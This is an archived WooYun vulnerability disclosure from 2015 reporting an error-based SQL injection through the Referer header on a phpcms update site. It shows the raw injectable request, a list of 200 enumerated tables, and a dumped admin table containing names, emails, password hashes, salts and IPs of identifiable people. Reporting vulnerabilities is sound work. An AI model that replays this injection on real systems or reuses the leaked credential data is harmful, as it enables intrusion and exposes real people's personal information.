phpcms某站点MySQL报错注入

编号121676
Urlhttp://www.wooyun.org/bug.php?action=view&id=121676
漏洞状态厂商已经确认
漏洞标题phpcms某站点MySQL报错注入
漏洞类型SQL注射漏洞
厂商phpcms
白帽子lijiejie
提交日期2015-06-19 19:52:00
公开日期2015-08-08 09:22:00
修复时间(not set)
确认时间2015-06-24 00:00:00
Confirm Spend5
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank10
厂商评级
厂商评rank5
漏洞简介
phpcms某站点MySQL报错注入
漏洞细节

Referer可注入:

GET /index.php HTTP/1.1
Referer: 123*
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4
Cookie: PHPSESSID=qhncam3i8qper9cd21l275k017
Host: update.phpcms.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

POC

current user:    '[email protected]%'
current database: 'phpcms_cn'
Database: phpcms_cn
[200 tables]
+--------------------------+
| v9_admin |
| v9_admin_panel |
| v9_admin_role |
| v9_admin_role_priv |
| v9_announce |
| v9_app_log_day |
| v9_app_log_total |
| v9_appcenter |
| v9_appcenter_data |
| v9_apps |
| v9_apps_content |
| v9_attachment |
| v9_attachment_index |
| v9_badword |
| v9_block |
| v9_block_history |
| v9_block_priv |
| v9_buycar |
| v9_cache |
| v9_category |
| v9_category_priv |
| v9_check_email |
| v9_collection_content |
| v9_collection_history |
| v9_collection_node |
| v9_collection_program |
| v9_comment |
| v9_comment_check |
| v9_comment_data_1 |
| v9_comment_relation |
| v9_comment_setting |
| v9_comment_table |
| v9_content_check |
| v9_copyfrom |
| v9_datacall |
| v9_dbsource |
| v9_developer |
| v9_dianping |
| v9_dianping_data |
| v9_dianping_type |
| v9_down |
| v9_down_data |
| v9_downservers |
| v9_edu |
| v9_edu_data |
| v9_en_down |
| v9_en_down_data |
| v9_en_news |
| v9_en_news_data |
| v9_extend_setting |
| v9_favorite |
| v9_finance |
| v9_friend |
| v9_hits |
| v9_info |
| v9_info_data |
| v9_ipbanned |
| v9_kefu_online |
| v9_kefu_process |
| v9_key |
| v9_keylink |
| v9_keyword |
| v9_keyword_data |
| v9_license |
| v9_license_logs |
| v9_link |
| v9_linkage |
| v9_log |
| v9_loveit |
| v9_loveit_mylove |
| v9_member |
| v9_member_address |
| v9_member_detail |
| v9_member_en |
| v9_member_group |
| v9_member_menu |
| v9_member_verify |
| v9_member_vip |
| v9_menu |
| v9_message |
| v9_message_data |
| v9_message_group |
| v9_miaosha |
| v9_miaosha_data |
| v9_model |
| v9_model_field |
| v9_module |
| v9_mood |
| v9_news |
| v9_news_data |
| v9_order |
| v9_order_complaint |
| v9_page |
| v9_pai |
| v9_pai_data |
| v9_pay_account |
| v9_pay_payment |
| v9_pay_record |
| v9_pay_spend |
| v9_pl |
| v9_pl_fee |
| v9_plug |
| v9_plug_data |
| v9_plugin |
| v9_plugin_var |
| v9_position |
| v9_position_data |
| v9_poster |
| v9_poster_201309 |
| v9_poster_201310 |
| v9_poster_201311 |
| v9_poster_201403 |
| v9_poster_201404 |
| v9_poster_201405 |
| v9_poster_201406 |
| v9_poster_201407 |
| v9_poster_201408 |
| v9_poster_201409 |
| v9_poster_201410 |
| v9_poster_201411 |
| v9_poster_201412 |
| v9_poster_201501 |
| v9_poster_201502 |
| v9_poster_201503 |
| v9_poster_201504 |
| v9_poster_201505 |
| v9_poster_201506 |
| v9_poster_space |
| v9_product |
| v9_product_data |
| v9_queue |
| v9_release_point |
| v9_score_vote |
| v9_search |
| v9_search_keyword |
| v9_session |
| v9_site |
| v9_sms_address |
| v9_sms_allowsend_ip |
| v9_sms_app |
| v9_sms_blacklist |
| v9_sms_check_queue |
| v9_sms_group |
| v9_sms_md5 |
| v9_sms_news |
| v9_sms_news_data |
| v9_sms_paylist |
| v9_sms_product |
| v9_sms_receive |
| v9_sms_scene |
| v9_sms_send_queue |
| v9_sms_service_queue_gid |
| v9_sms_service_report |
| v9_sms_tk |
| v9_sms_tpl |
| v9_special |
| v9_special_c_data |
| v9_special_content |
| v9_sphinx_counter |
| v9_sso_admin |
| v9_sso_applications |
| v9_sso_members |
| v9_sso_messagequeue |
| v9_sso_session |
| v9_sso_settings |
| v9_task |
| v9_task_quote |
| v9_task_stage |
| v9_template |
| v9_template_bak |
| v9_template_data |
| v9_times |
| v9_tuan |
| v9_type |
| v9_update_items |
| v9_update_notice |
| v9_update_referer |
| v9_update_site |
| v9_urlrule |
| v9_video_1 |
| v9_video_1_data |
| v9_visitor |
| v9_vote_data |
| v9_vote_option |
| v9_vote_subject |
| v9_wap |
| v9_wap_type |
| v9_workflow |
| v9_xzzd |
| v9_xzzd_data |
| v9_yp_certificate |
| v9_yp_company |
| v9_yp_design |
| v9_yp_design_data |
| v9_yp_guestbook |
| v9_yp_plug |
| v9_yp_plug_data |
| v9_yp_relation |
| v9_yp_template |
| v9_yp_template_data |
+--------------------------+


Database: phpcms_cn
Table: v9_admin
[3 entries]
+--------+--------+--------------------------------------------------+----------
------------+---------+--------------+----------+-------------------------------
---+-----------------+---------------+
| roleid | userid | card | email
| encrypt | username | realname | password
| lastloginip | lastlogintime |
+--------+--------+--------------------------------------------------+----------
------------+---------+--------------+----------+-------------------------------
---+-----------------+---------------+
| 1 | 1 | CQUHK1tTJ0NJVSArWxwDWCoBH3ItLCdLNlBQIFtYBwBfVnMC | wangdongw
[email protected] | z52Jxg | phpcms | <blank> | 710de87fff574e2123ec793e333c1b
ad | 114.251.167.194 | 1302248539 |
| 1 | 102 | <blank> | zhangming
[email protected] | VBqZUE | zhangmingxue | 张明雪 | 0664400c18b3fe8a28336493dc2
91372 | 10.228.132.12 | 1434703129 |
| 1 | 101 | <blank> | [email protected]
u6.com | dbtrn6 | mayuhui | 马玉辉 | 66685d46c2547db24c095798047
ef375 | 10.228.132.7 | 1434699380 |
+--------+--------+--------------------------------------------------+----------
------------+---------+--------------+----------+-------------------------------
---+-----------------+---------------+

修复方案

参数过滤

状态信息 2015-06-19: 细节已通知厂商并且等待厂商处理中
2015-06-24: 厂商已经确认,细节仅向厂商公开
2015-07-04: 细节向核心白帽子及相关领域专家公开
2015-07-14: 细节向普通白帽子公开
2015-07-24: 细节向实习白帽子公开
2015-08-08: 细节向公众公开
厂商回复感谢
回应信息危害等级:中漏洞Rank:5 确认时间:2015-06-24 09:21
Showing 1-1 of 1 item.
评论内容评论人点赞数评论时间

你好业务找你谈下 邮箱[email protected]

Cnb-Web02015-06-21 23:28:00